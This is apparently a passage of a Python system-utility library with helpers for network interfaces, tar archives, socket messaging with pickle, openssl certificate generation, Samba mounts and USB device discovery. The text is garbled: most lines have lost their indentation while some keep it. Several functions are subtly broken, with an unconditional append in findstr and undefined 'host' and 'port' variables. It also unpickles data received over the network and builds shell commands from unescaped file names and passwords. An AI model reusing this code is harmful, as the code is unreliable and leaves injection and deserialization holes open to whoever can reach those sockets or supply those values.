            if len(ii_a) > 2 and ii_a[2] == '030010AC':
                return ii_a[0]
def get_host_mac(ip=None,dev=None):
if is_ipv4(ip):
dev_info=get_net_device()
if isinstance(dev_info,dict):
for dev in dev_info.keys():
if get_net_dev_ip(dev) == ip:
return dev_info[dev]['mac']
elif dev:
return get_dev_mac(dev)
else:
#return ':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff) for ele in range(0,8*6,8)][::-1])
return str2mac('%012x' % uuid.getnode())
def get_net_dev_ip(ifname):
if os.path.isdir('/sys/class/net/{}'.format(ifname)) is False:
return False
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
            struct.pack('256s', _u_bytes(ifname[:15]))
)[20:24])
except:
try:
return os.popen('ip addr show {}'.format(ifname)).read().split("inet ")[1].split("/")[0]
except:
return
def make_tar(filename,filelist,ctype='gz',ignore_file=[]):
def ignore_files(filename,ignore_files):
if isinstance(ignore_files,(list,tuple)):
for ii in ignore_files:
if isinstance(ii,str) and (ii == filename or filename.startswith(ii)): return True
elif isinstance(ignore_files,str):
if ignore_files == filename or filename.startswith(ignore_files): return True
return False
    if ctype == 'bz2':
        tar = tarfile.open(filename,"w:bz2")
    elif ctype in ['stream',None,'tar']:
        tar = tarfile.open(filename,"w:")
    elif ctype == 'xz':
        tar = tarfile.open(filename,"w:xz")
    else:
        tar = tarfile.open(filename,"w:gz")
ig_dupl=[]
filelist_tmp=[]
filelist_type=type(filelist)
if filelist_type is list:
filelist_tmp=filelist
elif filelist_type is str:
filelist_tmp=filelist.split(',')
for ii in filelist_tmp:
if os.path.isfile(ii):
if ignore_files(ii,ignore_file): continue
ig_dupl.append(ii)
tar.add(ii)
elif os.path.isdir(ii):
for r,d,f in os.walk(ii):
if r in ignore_file or (len(d) == 1 and d[0] in ignore_file):
continue
for ff in f:
aa=os.path.join(r,ff)
if ignore_files(aa,ignore_file) or aa in ig_dupl: continue
ig_dupl.append(aa)
tar.add(aa)
else:
print('{} not found'.format(ii))
tar.close()
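# Usage sketch for make_tar() (illustrative comment only; paths are examples):
#   make_tar('/tmp/etc-backup.tgz','/etc/hosts,/etc/hostname')   # gzip by default
#   make_tar('/tmp/logs.tar.bz2',['/var/log'],ctype='bz2',
#            ignore_file=['/var/log/journal'])                   # skip a subtree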
def is_tempfile(filepath,tmp_dir='/tmp'):
filepath_arr=filepath.split('/')
if len(filepath_arr) == 1:
return False
    tmp_dir_arr=tmp_dir.split('/')
    if len(filepath_arr) < len(tmp_dir_arr):
        return False
    for ii in range(0,len(tmp_dir_arr)):
        if filepath_arr[ii] != tmp_dir_arr[ii]:
            return False
return True
def isfile(filename=None):
if filename is None:
return False
if len(filename) == 0:
return False
if os.path.isfile(filename):
return True
return False
def space(space_num=0,_space_=' '):
space_str=''
for ii in range(space_num):
space_str='{0}{1}'.format(space_str,_space_)
return space_str
def tap_print(string,bspace='',rc=False,NFLT=False):
rc_str=None
if type(string) is str:
for ii in string.split('\n'):
if NFLT:
line='%s'%(ii)
NFLT=False
else:
line='%s%s'%(bspace,ii)
if rc_str is None:
rc_str='%s'%(line)
else:
rc_str='%s\n%s'%(rc_str,line)
else:
rc_str='%s%s'%(bspace,string)
if rc:
return rc_str
else:
print(rc_str)
def str_format_print(string,rc=False):
if type(string) is str:
if len(string.split("'")) > 1:
rc_str='"%s"'%(string)
else:
rc_str="'%s'"%(string)
else:
rc_str=string
if rc:
return rc_str
else:
print(rc_str)
def clear_version(string,sym='.'):
if isinstance(string,(int,str)):
if isinstance(string,str): string=string.strip()
string='{}'.format(string)
else:
return False
arr=string.split(sym)
for ii in range(len(arr)-1,0,-1):
if arr[ii].replace('0','') == '':
arr.pop(-1)
else:
break
return sym.join(arr)
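# Usage sketch for clear_version() (illustrative comment only): trims trailing
# all-zero version fields.
#   clear_version('3.10.0')      -> '3.10'
#   clear_version('1.0.0')       -> '1'
#   clear_version('2-0',sym='-') -> '2'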
def get_key(dic=None,find=None):
return find_key_from_value(dic=dic,find=find)
def find_key_from_value(dic=None,find=None):
if isinstance(dic,dict):
if find is None:
return list(dic.keys())
else:
for key,val in dic.items():
if val == find:
return key
elif isinstance(dic,list) or isinstance(dic,tuple):
if find is None:
return len(dic)
else:
if find in dic:
return dic.index(find)
def load_kmod(modules,re_load=False):
if type(modules) is str:
modules=modules.split(',')
for ii in modules:
if re_load:
os.system('lsmod | grep {0} >& /dev/null && modprobe -r {0}'.format(ii.replace('-','_')))
os.system('lsmod | grep {0} >& /dev/null || modprobe --ignore-install {1} || modprobe {1} || modprobe -ib {1}'.format(ii.replace('-','_'),ii))
#os.system('lsmod | grep {0} >& /dev/null || modprobe -i -f {1}'.format(ii.split('-')[0],ii))
def reduce_string(string,symbol=' ',snum=0,enum=None):
if type(string) is str:
arr=string.split(symbol)
strs=None
if enum is None:
enum=len(arr)
for ii in range(snum,enum):
if strs is None:
strs='{0}'.format(arr[ii])
else:
strs='{0} {1}'.format(strs,arr[ii])
return strs
def findstr(string,find,prs=None,split_symbol='\n',patern=True):
    # Pattern return selection (^: First(0), $: End(-1), <int>: found item index)
found=[]
if not isinstance(string,str): return []
if split_symbol:
string_a=string.split(split_symbol)
else:
string_a=[string]
for nn in string_a:
if isinstance(find,(list,tuple)):
find=list(find)
else:
find=[find]
for ff in find:
if patern:
aa=re.compile(ff).findall(nn)
for mm in aa:
if isinstance(mm,tuple):
if prs == '^':
found.append(mm[0])
elif prs == '$':
found.append(mm[-1])
elif isinstance(prs,int):
found.append(mm[prs])
else:
found.append(mm)
else:
found.append(mm)
            else:
                find_a=ff.split('*')
                chk=True
                if len(find_a[0]) > 0:
                    if find_a[0] != nn[:len(find_a[0])]:
                        chk=False
                if len(find_a[-1]) > 0:
                    if find_a[-1] != nn[-len(find_a[-1]):]:
                        chk=False
                for ii in find_a[1:-1]:
                    if ii not in nn:
                        chk=False
                if chk:
                    found.append(nn)
found.append(nn)
return found
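# Usage sketch for findstr() (illustrative comment only):
#   findstr('eth0: up\neth1: down',r'(eth\d+): (\w+)',prs='^') -> ['eth0','eth1']
#   findstr('abc\nabd','ab*c',patern=False)                    -> ['abc']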
#def ipmi_sol(ipmi_ip,ipmi_user,ipmi_pass):
# if is_ipv4(ipmi_ip):
# rshell('''ipmitool -I lanplus -H {} -U {} -P {} sol info'''.format(ipmi_ip,ipmi_user,ipmi_pass))
#Set in progress : set-complete
#Enabled : true
#Force Encryption : false
#Force Authentication : false
#Privilege Level : OPERATOR
#Character Accumulate Level (ms) : 0
#Character Send Threshold : 0
#Retry Count : 0
#Retry Interval (ms) : 0
#Volatile Bit Rate (kbps) : 115.2
#Non-Volatile Bit Rate (kbps) : 115.2
#Payload Channel : 1 (0x01)
#Payload Port : 623
def net_send_data(sock,data,key='kg',enc=False,timeout=0):
if type(sock).__name__ in ['socket','_socketobject','SSLSocket'] and data and type(key) is str and len(key) > 0 and len(key) < 7:
start_time=TIME().Int()
# encode code here
if timeout > 0:
sock.settimeout(timeout)
nkey=_u_str2int(key)
pdata=pickle.dumps(data,protocol=2) # common 2.x & 3.x version : protocol=2
data_type=_u_bytes(type(data).__name__[0])
if enc and key:
# encode code here
#enc_tf=_u_bytes('t') # Now not code here. So, everything to 'f'
#pdata=encode(key,pdata)
enc_tf=_u_bytes('f')
else:
enc_tf=_u_bytes('f')
ndata=struct.pack('>IssI',len(pdata),data_type,enc_tf,nkey)+pdata
try:
sock.sendall(ndata)
return True,'OK'
except:
if timeout > 0:
#timeout=sock.gettimeout()
if TIME().Int() - start_time > timeout-1:
#Timeout
return False,'Sending Socket Timeout'
return False,'Sending Fail'
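# Wire format shared by net_send_data()/net_receive_data() (descriptive comment):
# a 10-byte big-endian header packed as '>IssI' -- payload length (4B), payload
# type initial (1B, e.g. b'd' for dict), encryption flag (1B, b't'/b'f') and the
# numeric key (4B) -- followed by the pickled payload. struct.calcsize('>IssI')
# is 10, which is why the receiver below starts with recvall(sock,10).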
def net_receive_data(sock,key='kg',progress=None,retry=0,retry_timeout=30):
# decode code here
def recvall(sock,count,progress=False): # Packet
buf = b''
file_size_d=int('{0}'.format(count))
if progress: print('\n')
tn=0
newbuf=None
while count:
if progress:
sys.stdout.write('\rDownloading... [ {} % ]'.format(int((file_size_d-count) / file_size_d * 100)))
sys.stdout.flush()
try:
newbuf = sock.recv(count)
except socket.error as e:
if tn < retry:
print("[ERROR] timeout value:{} retry: {}/{}\n{}".format(sock.gettimeout(),tn,retry,e))
tn+=1
TIME().Sleep(1)
sock.settimeout(retry_timeout)
continue
                if isinstance(e,socket.timeout) or str(e) == 'timed out':
                    return 'timeout',e
if not newbuf: return True,None #maybe something socket issue.
buf += newbuf
count -= len(newbuf)
if progress:
sys.stdout.write('\rDownloading... [ 100 % ]\n')
sys.stdout.flush()
return True,buf
ok,head=recvall(sock,10)
if krc(ok,chk=True):
if head:
try:
st_head=struct.unpack('>IssI',_u_bytes(head))
except:
return [False,'Fail for read header({})'.format(head)]
if st_head[3] == _u_str2int(key):
ok,data=recvall(sock,st_head[0],progress=progress)
if krc(ok,chk=True):
                if st_head[2] in (b't','t'):
# decode code here
# data=decode(data)
pass
if data: return [st_head[1],pickle.loads(data)]
return [True,None]
else:
return [ok,data]
else:
return [False,'Wrong key']
return ['lost','Connection lost']
return ok,head
def net_put_and_get_data(IP,data,PORT=8805,key='kg',timeout=3,try_num=1,try_wait=[0,5],progress=None,enc=False,upacket=None,SSLC=False,log=True):
sent=False,'Unknown issue'
for ii in range(0,try_num):
if upacket: # Update packet function for number of try information ([#/<total #>])
data=upacket('ntry',[ii+1,try_num],data)
start_time=TIME().Int()
        sock=net_get_socket(IP,PORT,timeout=timeout,SSLC=SSLC)
        if sock is False:
            # no socket yet; wait and retry instead of passing False down the stack
            TIME().Sleep(try_wait)
            continue
if try_num > 0:
rtry_wait=(timeout//try_num)+1
else:
rtry_wait=try_wait
sent=False,'Unknown issue'
try:
sent=net_send_data(sock,data,key=key,enc=enc)
except:
os.system("""[ -f /tmp/.{0}.{1}.crt ] && rm -f /tmp/.{0}.{1}.crt""".format(host,port))
if sent[0]:
nrcd=net_receive_data(sock,key=key,progress=progress)
return nrcd
else:
if timeout >0:
if TIME().Int() - start_time >= timeout-1:
return [False,'Socket Send Timeout']
#return [False,'Data protocol version mismatch']
if sock: sock.close()
if try_num > 1:
if log:
print('try send data ... [{}/{}]'.format(ii+1,try_num))
TIME().Sleep(try_wait)
return [False,'Send fail({}) :\n{}'.format(sent[1],data)]
def net_get_socket(host,port,timeout=3,dbg=0,SSLC=False): # host : Host name or IP
try:
af, socktype, proto, canonname, sa = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)[0]
except:
        print('Can not get network information of {}:{}'.format(host,port))
return False
try:
soc = socket.socket(af, socktype, proto)
if timeout > 0:
soc.settimeout(timeout)
except socket.error as msg:
print('could not open socket of {0}:{1}\n{2}'.format(host,port,msg))
return False
###### SSL Wrap ######
if SSLC:
for i in range(0,5):
icertfile='/tmp/.{}.{}.crt'.format(host,port)
try:
cert=ssl.get_server_certificate((host,port))
except:
os.system('rm -f /tmp/.{}.{}.crt'.format(host,port))
TIME().Sleep(1)
continue
f=open(icertfile,'w')
f.write(cert)
f.close()
TIME().Sleep(0.3)
try:
soc=ssl.wrap_socket(soc,ca_certs=icertfile,cert_reqs=ssl.CERT_REQUIRED)
soc.connect((host,port))
return soc
except socket.error as msg:
if dbg > 3:
print(msg)
TIME().Sleep(1)
########################
else:
try:
soc.connect(sa)
return soc
except socket.error as msg:
if dbg > 3:
print('can not connect at {0}:{1}\n{2}'.format(host,port,msg))
return False
def net_start_server(server_port,main_func_name,server_ip='',timeout=0,max_connection=10,log_file=None,certfile=None,keyfile=None):
ssoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssoc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if timeout > 0:
ssoc.settimeout(timeout)
try:
ssoc.bind((server_ip, server_port))
except socket.error as msg:
print('Bind failed. Error : {0}'.format(msg))
os._exit(1)
ssoc.listen(max_connection)
print('Start server for {0}:{1}'.format(server_ip,server_port))
# for handling task in separate jobs we need threading
while True:
conn, addr = ssoc.accept()
ip, port = str(addr[0]), str(addr[1])
try:
if certfile and keyfile:
ssl_conn=ssl_wrap(conn,certfile,keyfile=keyfile)
Thread(target=main_func_name, args=(ssl_conn, ip, port, log_file)).start()
else:
Thread(target=main_func_name, args=(conn, ip, port, log_file)).start()
except:
print('No more generate thread for client from {0}:{1}'.format(ip,port))
ssoc.close()
def net_start_single_server(server_port,main_func_name,server_ip='',timeout=0,max_connection=10,log_file=None,certfile=None,keyfile=None):
ssoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssoc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if timeout > 0:
ssoc.settimeout(timeout)
try:
ssoc.bind((server_ip, server_port))
except socket.error as msg:
print('Bind failed. Error : {0}'.format(msg))
os._exit(1)
ssoc.listen(max_connection)
print('Start server for {0}:{1}'.format(server_ip,server_port))
# for handling task in separate jobs we need threading
conn, addr = ssoc.accept()
ip, port = str(addr[0]), str(addr[1])
if certfile and keyfile:
ssl_conn=ssl_wrap(conn,certfile,keyfile=keyfile)
rc=main_func_name(ssl_conn, ip, port, log_file)
else:
rc=main_func_name(conn, ip, port, log_file)
ssoc.close()
return rc
def check_work_dir(work_dir,make=False,ntry=1,try_wait=[1,3]):
for ii in range(0,ntry):
if os.path.isdir(work_dir):
return True
else:
if make:
try:
os.makedirs(work_dir)
return True
except:
TIME().Sleep(try_wait)
return False
def get_node_info(loop=0):
host_ip=get_host_ip()
return {
'host_name':get_host_name(),
'host_ip':host_ip,
'host_mac':get_host_mac(ip=host_ip),
'ipmi_mac':get_ipmi_mac(loop=loop)[1],
'ipmi_ip':get_ipmi_ip()[1],
}
def kmp(mp={},func=None,name=None,timeout=0,quit=False,log_file=None,log_screen=True,log_raw=False, argv=[],queue=None):
# Clean
for n in [k for k in mp]:
if quit is True:
if n != 'log':
mp[n]['mp'].terminate()
if 'log' in mp:
mp['log']['queue'].put('\nterminate function {}'.format(n))
else:
if mp[n]['timeout'] > 0 and TIME().Int() > mp[n]['timeout']:
mp[n]['mp'].terminate()
if 'log' in mp:
mp['log']['queue'].put('\ntimeout function {}'.format(n))
if not mp[n]['mp'].is_alive():
del mp[n]
if quit is True and 'log' in mp:
mp['log']['queue'].put('\nterminate function log')
TIME().Sleep(2)
mp['log']['mp'].terminate()
return
# LOG
def logging(ql,log_file=None,log_screen=True,raw=False):
while True:
#if not ql.empty():
if ql.empty():
TIME().Sleep(0.01)
else:
ll=ql.get()
if raw:
log_msg=ll
else:
log_msg='{} : {}\n'.format(TIME().Now().strftime('%m-%d-%Y %H:%M:%S'),ll)
if type(log_msg) is not str:
log_msg='{}'.format(log_msg)
if log_file and os.path.isdir(os.path.dirname(log_file)):
with open(log_file,'a') as f:
f.write('{}'.format(log_msg))
if log_screen:
sys.stdout.write(log_msg)
sys.stdout.flush()
if 'log' not in mp or not mp['log']['mp'].is_alive():
#log=multiprocessing.Queue()
log=Queue()
#lqp=multiprocessing.Process(name='log',target=logging,args=(log,log_file,log_screen,log_raw,))
lqp=Process(name='log',target=logging,args=(log,log_file,log_screen,log_raw,))
lqp.daemon = True
mp.update({'log':{'mp':lqp,'start':TIME().Int(),'timeout':0,'queue':log}})
lqp.start()
# Functions
if func:
if name is None:
name=func.__name__
if name not in mp:
if argv:
#mf=multiprocessing.Process(name=name,target=func,args=tuple(argv))
mf=Process(name=name,target=func,args=tuple(argv))
else:
#mf=multiprocessing.Process(name=name,target=func)
mf=Process(name=name,target=func)
if timeout > 0:
timeout=TIME().Int()+timeout
# for aa in argv:
# if type(aa).__name__ == 'Queue':
# mp.update({name:{'mp':mf,'timeout':timeout,'start':now(),'queue':aa}})
if name not in mp:
if queue and type(queue).__name__ == 'Queue':
mp.update({name:{'mp':mf,'timeout':timeout,'start':TIME().Int(),'queue':queue}})
else:
mp.update({name:{'mp':mf,'timeout':timeout,'start':TIME().Int()}})
mf.start()
return mp
def key_remove_pass(filename):
rshell('openssl rsa -in {0}.key -out {0}.nopass.key'.format(filename))
def cert_file(keyfile,certfile,C='US',ST='CA',L='San Jose',O='KGC',OU='KG',CN=None,EMAIL=None,days=365,passwd=None,mode='gen'):
if keyfile is None and certfile is None:
return None,None
if mode == 'remove':
rc=rshell('openssl rsa -in {0} -out {0}.nopass'.format(keyfile))
if rc[0] == 0:
if os.path.isfile('{}'.format(certfile)):
return '{}.nopass'.format(keyfile),certfile
else:
                return '{}.nopass'.format(keyfile),None
elif mode == 'gen' or (mode == 'auto' and (os.path.isfile(keyfile) is False or os.path.isfile(certfile) is False)):
if mode == 'gen':
os.system('''rm -f {}'''.format(certfile))
os.system('''rm -f {}'''.format(keyfile))
os.system('''rm -f {}.csr'''.format(keyfile))
subj=''
if C:
subj='{}/C={}'.format(subj,C)
if ST:
subj='{}/ST={}'.format(subj,ST)
if L:
subj='{}/L={}'.format(subj,L)
if O:
subj='{}/O={}'.format(subj,O)
if OU:
subj='{}/OU={}'.format(subj,OU)
if CN:
subj='{}/CN={}'.format(subj,CN)
if EMAIL:
subj='{}/emailAddress={}'.format(subj,EMAIL)
if subj:
subj=' -subj "{}"'.format(subj)
# gen
rc=(1,'error','error',0,0,'','')
if os.path.isfile(keyfile) is False:
if passwd:
# gen KEY
rc=rshell('openssl genrsa -aes256 -out {0} 2048'.format(keyfile))
else:
#print('openssl genrsa -out {0} 2048'.format(keyfile))
rc=rshell('openssl genrsa -out {0} 2048'.format(keyfile))
if (os.path.isfile(keyfile) and os.path.isfile(certfile) is False) or rc[0] == 0:
# gen CSR
os.system('''rm -f {}'''.format(certfile))
os.system('''rm -f {}.csr'''.format(keyfile))
rrc=rshell('openssl req -new -key {0} -out {0}.csr {1}'.format(keyfile,subj))
if rrc[0] == 0:
# gen cert
#print('openssl x509 -req -days {1} -in {0}.csr -signkey {0} -out {2}'.format(keyfile,days,certfile))
rrrc=rshell('openssl x509 -req -days {1} -in {0}.csr -signkey {0} -out {2}'.format(keyfile,days,certfile))
if rrrc[0] == 0:
# check
# print(rshell('openssl x509 -text -noout -in {}'.format(certfile))[1])
return keyfile,certfile
else:
key_file=None
crt_file=None
if os.path.isfile(keyfile):
key_file=keyfile
if os.path.isfile(certfile):
crt_file=certfile
return key_file,crt_file
return None,None
def rreplace(source_string, replace_what, replace_with):
head, _sep, tail = source_string.rpartition(replace_what)
return head + replace_with + tail
def net_put_data(IP,data,PORT=8805,key='kg',timeout=3,try_num=1,try_wait=[1,10],progress=None,enc=False,upacket=None,dbg=0,wait_time=3,SSLC=False):
sent=False,'Unknown issue'
for ii in range(0,try_num):
if upacket: # Update packet function for number of try information ([#/<total #>])
data=upacket('ntry',[ii+1,try_num],data)
sock=net_get_socket(IP,PORT,timeout=timeout,dbg=dbg,SSLC=SSLC)
if sock is False:
if dbg >= 3:
print('Can not get socket data [{}/{}], wait {}s'.format(ii+1,try_num,wait_time))
else:
sys.stdout.write('.')
sys.stdout.flush()
TIME().Sleep(wait_time)
continue
sent=False,'Unknown issue'
try:
sent=net_send_data(sock,data,key=key,enc=enc)
except:
print('send fail, try again ... [{}/{}]'.format(ii+1,try_num))
if sent[0]:
if sock:
sock.close()
return [True,'sent']
if try_num > 1:
wait_time=Random(length=0,strs=try_wait,mode='int')
if dbg >= 3:
print('try send data ... [{}/{}], wait {}s'.format(ii+1,try_num,wait_time))
TIME().Sleep(wait_time)
return [False,'Send fail({}) :\n{}'.format(sent[1],data)]
def encode(string):
enc='{0}'.format(string)
tmp=zlib.compress(enc.encode("utf-8"))
return '{0}'.format(base64.b64encode(tmp).decode('utf-8'))
def decode(string):
if type(string) is str:
dd=zlib.decompress(base64.b64decode(string))
return '{0}'.format(dd.decode("utf-8"))
return string
def mount_samba(url,user,passwd,mount_point):
if os.path.isdir(mount_point) is False:
os.system('sudo mkdir -p {0}'.format(mount_point))
TIME().Sleep(1)
        if os.path.isdir(mount_point) is False:
            return False,'can not make a {} directory'.format(mount_point)
if 'smb://' in url:
url_a=url.split('/')
url_m=len(url_a)
iso_file=url_a[-1]
new_url=''
for i in url_a[2:url_m-1]:
new_url='{0}/{1}'.format(new_url,i)
rc=rshell('''sudo mount -t cifs -o user={0} -o password={1} /{2} {3}'''.format(user,passwd,new_url,mount_point))
        if rc[0] == 0:
            return True,rc[1]
        return False,rc[1]
else:
url_a=url.split('\\')
url_m=len(url_a)
iso_file=url_a[-1]
new_url=''
for i in url_a[1:url_m-1]:
new_url='{0}/{1}'.format(new_url,i)
rc=rshell('''sudo mount -t cifs -o user={0} -o password={1} {2} {3}'''.format(user,passwd,new_url,mount_point))
        if rc[0] == 0:
            return True,rc[1]
        return False,rc[1]
def umount(mount_point,del_dir=False):
rc=rshell('''[ -d {0} ] && sudo mountpoint {0} && sleep 1 && sudo umount {0} && sleep 1'''.format(mount_point))
if rc[0] == 0 and del_dir:
os.system('[ -d {0} ] && sudo rmdir {0}'.format(mount_point))
return rc
def is_xml(filename):
firstLine_i=FILE().Rw(filename,out='string',read='firstline')
if krc(firstLine_i,chk=True):
firstLine=get_value(firstLine_i,1)
    else:
        firstLine=None
        filename_str=_u_byte2str(filename)
        if isinstance(filename_str,str):
            firstLine=filename_str.split('\n')[0]
if isinstance(firstLine,str) and firstLine.split(' ')[0] == '<?xml':
return True
return False
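# is_xml() accepts either a file path or raw content, e.g.:
#   is_xml('/tmp/config.xml')                  # reads the file's first line
#   is_xml('<?xml version="1.0"?>\n<a/>')      # inspects the string directly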
def krc(rt,chk='_',
        rtd={'GOOD':[True,'True','Good','Ok','Pass',{'OK'},0],
             'FAIL':[False,'False','Fail',{'FAL'}],
             'NONE':[None,'None','N/A',{'NA'}],
             'IGNO':['IGNO','Ignore',{'IGN'}],
             'ERRO':['ERR','Error','error','erro','ERRO',{'ERR'}],
             'WARN':['Warn','warn',{'WAR'}],
             'UNKN':['Unknown','UNKN',{'UNK'}],
             'JUMP':['Jump',{'JUMP'}],
             'TOUT':['timeout','TimeOut','time out','Time Out','TMOUT','TOUT',{'TOUT'}],
             'REVD':['cancel','Cancel','CANCEL','REV','REVD','Revoked','revoked','revoke','Revoke',{'REVD'}],
             'LOST':['lost','connection lost','Connection Lost','Connection lost','CONNECTION LOST',{'LOST'}]},
        default=False):
def trans(irt):
type_irt=type(irt)
for ii in rtd:
for jj in rtd[ii]:
if type(jj) == type_irt and ((type_irt is str and jj.lower() == irt.lower()) or jj == irt):
return ii
return 'UNKN'
rtc=Get(rt,'0|rc',out='raw',err='ignore',check=(list,tuple,dict))
nrtc=trans(rtc)
if chk != '_':
if not isinstance(chk,list): chk=[chk]
for cc in chk:
if trans(cc) == nrtc:
return True
if nrtc == 'UNKN' and default == 'org':
return rtc
if default == 'org': return rt
return default
return nrtc
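# krc() normalizes heterogeneous return codes into category strings
# (assuming Get() passes scalar inputs through unchanged), e.g.:
#   krc(0)              -> 'GOOD'
#   krc('Fail')         -> 'FAIL'
#   krc('Ok', chk=True) -> True   (membership check instead of translation)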
def replacestr(data,org,new):
if isinstance(data,str):
if not isinstance(org,str): org=_u_bytes2str(org)
if not isinstance(new,str): new=_u_bytes2str(new)
elif isinstance(data,bytes):
if not isinstance(org,bytes): org=_u_bytes(org)
if not isinstance(new,bytes): new=_u_bytes(new)
return data.replace(org,new)
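# replacestr() coerces org/new to the type of data before replacing, e.g.:
#   replacestr('abc', 'b', 'x')    -> 'axc'
#   replacestr(b'abc', 'b', 'x')   -> b'axc'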
def get_iso_uid(filename):
if type(filename) is not str:
return False,None,None
if os.path.exists(filename):
uid_cmd='''sudo /usr/sbin/blkid {}'''.format(filename)
rc=rshell(uid_cmd)
if rc[0] == 0:
            uid_str='{0}_{1}'.format(findstr(rc[1],r'UUID="(\w.*)" L')[0],findstr(rc[1],r'LABEL="(\w.*)" T')[0]).replace(' ','_')
file_info=get_file(filename)
file_size=file_info.get('size',None)
return True,uid_str,file_size
return False,rc[1],None
return False,'{} not found'.format(filename),None
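# Sketch (needs sudo and /usr/sbin/blkid; the path is hypothetical):
#   ok, uid_str, size = get_iso_uid('/isos/install.iso')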
def find_usb_dev(size=None,max_size=None):
rc=[]
load_kmod(modules=['usb-storage'])
    if os.path.isdir('/sys/block') is False:
        return rc
for r, d, f in os.walk('/sys/block'):
for dd in d:
for rrr,ddd,fff in os.walk(os.path.join(r,dd)):
if 'removable' in fff:
removable=cat('{0}/removable'.format(rrr))
if removable:
if '1' in removable:
if size is None:
if max_size:
file_size=cat('{0}/size'.format(rrr))
if file_size:
dev_size=int(file_size) * 512
if dev_size <= int(max_size):
rc.append('/dev/{0}'.format(dd))
else:
rc.append('/dev/{0}'.format(dd))
else:
file_size=cat('{0}/size'.format(rrr))
if file_size:
dev_size=int(file_size) * 512
if dev_size == int(size):
rc.append('/dev/{0}'.format(dd))
return rc
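# find_usb_dev() walks /sys/block for removable devices; sizes are bytes
# (sector count * 512). E.g. all removable drives up to 64GB:
#   devs = find_usb_dev(max_size=64*1024**3)   # -> e.g. ['/dev/sdb']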
def alive(out=None):
aa=rshell('uptime')
if aa[0] == 0:
aa_a=aa[1].split()
if len(aa_a) > 2:
if ':' in aa_a[2]:
if out in ['sec','second','seconds',int]:
bb_a=aa_a[2][:-1].split(':')
return int(bb_a[0])*3600+int(bb_a[1])*60
else:
return aa_a[2][:-1]+'h'
elif aa_a[3] == 'min,':
if out in ['sec','second','seconds',int]:
return int(aa_a[2])*60
else:
return aa_a[2]+'m'
else:
if out in ['sec','second','seconds',int]:
if ':' in aa_a[4]:
bb_a=aa_a[4][:-1].split(':')
return int(aa_a[2])*(24*3600)+int(bb_a[0])*3600+int(bb_a[1])*60
else:
if aa_a[5] == 'min,':
return int(aa_a[2])*(24*3600)+int(aa_a[4])*60
else:
return int(aa_a[2])*(24*3600)+int(aa_a[4])
else:
return aa_a[2]+'d'
if out in ['sec','second','seconds',int]:
return -1
else:
return 'unknown'
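# alive() parses `uptime` output, e.g.:
#   alive(out=int)   # uptime in seconds, or -1 if it cannot be parsed
#   alive()          # human-readable, e.g. '3:24h', '12m', or '5d'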
class Multiprocessor():
def __init__(self):
self.processes = []
self.queue = Queue()
@staticmethod
def _wrapper(func, queue, args, kwargs):
ret = func(*args, **kwargs)
queue.put(ret)
def run(self, func, *args, **kwargs):
args2 = [func, self.queue, args, kwargs]
p = Process(target=self._wrapper, args=args2)
self.processes.append(p)
p.start()
    def wait(self):
        rets = []
        procs, self.processes = self.processes, []
        for _ in procs:
            rets.append(self.queue.get())   # results arrive in completion order
        for p in procs:
            p.join()                        # reap children to avoid zombies
        return rets
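# Minimal usage sketch (results come back in completion order, and the
# function and its arguments must be picklable):
#   mp = Multiprocessor()
#   for n in (1, 2, 3):
#       mp.run(pow, n, 2)
#   print(mp.wait())   # e.g. [1, 4, 9]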
def ddict(*inps,**opts):
out={}
for ii in inps:
if isinstance(ii,dict):
out.update(ii)
if opts:
out.update(opts)
return out
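# ddict() merges any number of dicts, with keyword arguments winning, e.g.:
#   ddict({'a': 1, 'b': 2}, {'b': 3}, c=4)   -> {'a': 1, 'b': 3, 'c': 4}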
def fdict(src,keys):
if isinstance(src,dict) and isinstance(keys,list):
new_out={}
for kk in keys:
new_out[kk]=src.get(kk)
return new_out
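# fdict() projects a dict onto a key list (missing keys map to None), e.g.:
#   fdict({'a': 1, 'b': 2}, ['a', 'c'])   -> {'a': 1, 'c': None}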
def pipe_msg(**opts):
m={}
if not pipe_file: return False
if os.path.isfile(pipe_file):
with open(pipe_file,'rb') as f:
m=pickle.load(f)
if opts:
m.update(opts)
with open(pipe_file,'wb') as f:
pickle.dump(m,f, protocol=pickle.HIGHEST_PROTOCOL)
else:
return m
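# pipe_msg() persists a small state dict at the module-level pipe_file path:
#   pipe_msg(stage='copy', pct=50)   # merge keys into the pickled state
#   state = pipe_msg()               # read the current state back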
def Try(cmd):
    try:
        # call cmd here (when it is callable) so its exceptions are actually caught
        return True,cmd() if callable(cmd) else cmd
    except Exception:
        e=sys.exc_info()[0]
        return False,{'err':e}
def FixIndex(src,idx,default=0):
if isinstance(src,(list,tuple,str,dict)) and isinstance(idx,int):
if idx < 0:
if len(src) > abs(idx):
idx=len(src)-abs(idx)
else:
idx=0
        else:
            if len(src) <= idx: idx=max(len(src)-1,0)
return idx
return default
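# FixIndex() clamps an index into src's valid range, e.g.:
#   FixIndex([10, 20, 30], -1)   -> 2
#   FixIndex([10, 20, 30], 9)    -> 2
#   FixIndex([10, 20, 30], -9)   -> 0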
def Next(src,step=0,out=None,default='org'):
if isinstance(src,(list,tuple,dict)):
step=FixIndex(src,step)
iterator=iter(src)
for i in range(-1,step):
rt=next(iterator)
return OutFormat(rt,out=out)
elif isinstance(src,str):
step=FixIndex(src,step)
if len(src) == 0:
return ''
        else:
            return OutFormat(src[step],out=out)
    if default == 'org': return src
    return OutFormat(default,out=out)
def Timeout(timeout_sec,init_time=None,default=(24*3600)):
if timeout_sec == 0: return True,0
init_time=integer(init_time,default=0)
timeout_sec=integer(timeout_sec,default=default)
if init_time == 0:
init_time=TIME().Int()
if timeout_sec == 0:
return False,init_time
if timeout_sec < 3:
timeout_sec=3
if TIME().Int() - init_time > timeout_sec:
return True,init_time
return False,init_time
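# Timeout() is a polling helper: arm it once, then pass the returned start
# time back until the flag flips, e.g.:
#   expired, t0 = Timeout(30)        # arms a 30s timer
#   while not expired:
#       ...                          # do work, sleep, etc.
#       expired, t0 = Timeout(30, t0)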
#################################################################
def Wrap(src,space='',space_mode='space',sym='\n',default=None,NFLT=False,out=str):
